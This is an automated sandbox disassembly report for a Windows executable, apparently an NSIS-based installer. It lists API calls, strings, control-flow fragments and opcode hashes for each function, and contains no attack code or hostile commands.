                                                                                                                                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                          • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: HideWindow
                                                                                                                                                                                                                                                                                                          • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                          • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                          • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                          • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID: F$A
                                                                                                                                                                                                                                                                                                          • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
